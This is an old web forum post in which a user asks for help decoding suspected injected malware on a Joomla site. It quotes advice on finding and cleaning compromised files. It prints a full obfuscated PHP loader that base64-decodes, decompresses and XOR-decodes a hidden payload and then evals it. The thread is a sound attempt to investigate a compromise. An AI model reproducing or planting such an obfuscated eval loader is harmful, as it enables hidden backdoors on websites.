Thread: base64 decode
View Single Post
  #3 (permalink)  
Old 09-22-09, 05:06 PM
xmatias xmatias is offline
New Member
  
Join Date: Sep 2009
Posts: 2
Thanks: 0
Thanked 0 Times in 0 Posts
DECODE eval(base64_decode
Quote:
Originally Posted by wirehopper View Post
To me, that looks like the script got hacked, or it is placed there to hack.

It decodes to:

PHP Code:

$document =& JFactory::getDocument();

$document->addCustomTag($header_code);

echo $MyForm->addhash(); 
I think you should backup your database, clean the server, save any files you can, and upgrade.

Joomla! Developer - Core Security

To determine the extent of the problem, you can use grep -r GRvY3VtZW50ID0mIEpGYWN0b3J *. Then, you either have to remove the code from the files, or delete them. Check for .htaccess files, too.

Please, can you helpme to decode this script, i try everythin but I can't decode it:

PHP Code:

<?php 

$o="QAAADjs4d293J25pZGtyY2InLwAAU0JKV0tGU0JXRlNPJyknIAABKGFiZnNydWJjKmFoaHMpAsAAQCAuPCc4OQoNDgAwO2NucSduEUBjOiUB0WJ1JQFwJwAUO281OURoAIB3fnVuYG9zJwZjYmRvaCdjZgMAc2IvJV4lBHIBlGVraGBuaWFoAgEvIGlmamIGIycqJ0ZraydVBAEACXQnVWJ0YnVxYmM7KAWACg0GVAAAJzt3OVNvYiclRGZhYidXdQAAYnR0JSdzb2JqYidlfj0nOwAAZidvdWJhOiVvc3N3PSgocAEFcHApcG5kbAzgcGh1Y3cDASoC8gIAdClkaGooA8Buc2tiOiVBdWIUsGInUAI1JwYwamIFoDkBjwGAOyhmOQwAJ2ZpYwb/BvB3dWhtYmRzaWZzFExma2ANwHUGkSU5VwFzJ0kBgQQROyhOQHcT1DsoFVAAxA5xCg0BIyc7JioqJ0AOYgaAcHVmd3didScqKgJwAfAcInARMHdYYRogYnUvFZIKDQGVF1JgYnNYAABod3NuaGkvIGBoaGBrYlhmAOBpZmt+c25kdBbzAxIGIFxuYSdOCABCJzFaBcA7dGR1bndzJ3N+d4AiEVBzYn9zKG1mcWYBYyU5JyAgKAAELUtoZmMnbVZyYnV+JwPAaWgAEHMnZmt1YmZjfidrAbBiYy0opAABgC8EQWhhApU6OicgcmljYmFuAABpYmMgLnwnY2hkcmpiaXMpGSBwdW4iAQe6WyUHzFslEaB0dWQ6W4IwHbVmbWZ/KQ2jZnduHPMBQShrbmUIEHQobXYJ8Sg2KTQpNQDUKWpuaQAUKW10WyU5OyglLCUNQzkpYXFmAAB1J1hYaWhkaGlha25kcyc6AMAnc3VyYjwneg8RAeFOQjFSV0MAFEZTQlhIV1NOSElUAjB8ENAOboBEA0B0WHdmc289JwmldHNmFmApbgwCYjFydy/BIBEob2h0c2JjKAFWKACvbmpmYGJ0KCUEYHoboCgJBACwAKMYT585GaElJxBRBq8GrwaoCJZtdA/RBgMe4SZcJeAQQG5hWiWFKGVoY34BkShvc2prOQ==";eval(base64_decode("JGxsbD0wO2V2YWwoYmFzZTY0X2RlY29kZSgiSkd4c2JHeHNiR3hzYkd4c1BTZGlZWE5sTmpSZlpHVmpiMlJsSnpzPSIpKTskbGw9MDtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd3OUoyOXlaQ2M3IikpOyRsbGxsPTA7JGxsbGxsPTM7ZXZhbCgkbGxsbGxsbGxsbGwoIkpHdzlKR3hzYkd4c2JHeHNiR3hzS0NSdktUcz0iKSk7JGxsbGxsbGw9MDskbGxsbGxsPSgkbGxsbGxsbGxsbCgkbFsxXSk8PDgpKyRsbGxsbGxsbGxsKCRsWzJdKTtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd4c2JHdzlKM04wY214bGJpYzciKSk7JGxsbGxsbGxsbD0xNjskbGxsbGxsbGw9IiI7Zm9yKDskbGxsbGw8JGxsbGxsbGxsbGxsbGwoJGwpOyl7aWYoJGxsbGxsbGxsbD09MCl7JGxsbGxsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8OCk7JGxsbGxsbCs9JGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTskbGxsbGxsbGxsPTE2O31pZigkbGxsbGxsJjB4ODAwMCl7JGxsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8NCk7JGxsbCs9KCRsbGxsbGxsbGxsKCRsWyRsbGxsbF0pPj40KTtpZigkbGxsKXskbGw9KCRsbGxsbGxsbGxsKCRsWyRsbGxsbCsrXSkmMHgwZikrMztmb3IoJGxsbGw9MDskbGxsbDwkbGw7JGxsbGwrKykkbGxsbGxsbGxbJGxsbGxsbGwrJGxsbGxdPSRsbGxsbGxsbFskbGxsbGxsbC0kbGxsKyRsbGxsXTskbGxsbGxsbCs9JGxsO31lbHNleyRsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8OCk7JGxsKz0kbGxsbGxsbGxsbCgkbFskbGxsbGwrK10pKzE2O2ZvcigkbGxsbD0wOyRsbGxsPCRsbDskbGxsbGxsbGxbJGxsbGxsbGwrJGxsbGwrK109JGxsbGxsbGxsbGwoJGxbJGxsbGxsXSkpOyRsbGxsbCsrOyRsbGxsbGxsKz0kbGw7fX1lbHNlJGxsbGxsbGxsWyRsbGxsbGxsKytdPSRsbGxsbGxsbGxsKCRsWyRsbGxsbCsrXSk7JGxsbGxsbDw8PTE7JGxsbGxsbGxsbC0tO31ldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd4c2JEMG5ZMmh5SnpzPSIpKTskbGxsbGw9MDtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkQwaVB5SXVKR3hzYkd4c2JHeHNiR3hzYkNnMk1pazciKSk7JGxsbGxsbGxsbGw9IiI7Zm9yKDskbGxsbGw8JGxsbGxsbGw7KXskbGxsbGxsbGxsbC49JGxsbGxsbGxsbGxsbCgkbGxsbGxsbGxbJGxsbGxsKytdXjB4MDcpO31ldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkM0OUpHeHNiR3hzYkd4c2JHd3VKR3hzYkd4c2JHeHNiR3hzYkNnMk1Da3VJajhpT3c9PSIpKTtldmFsKCRsbGxsbGxsbGwpOw=="));return;?>
Reply With Quote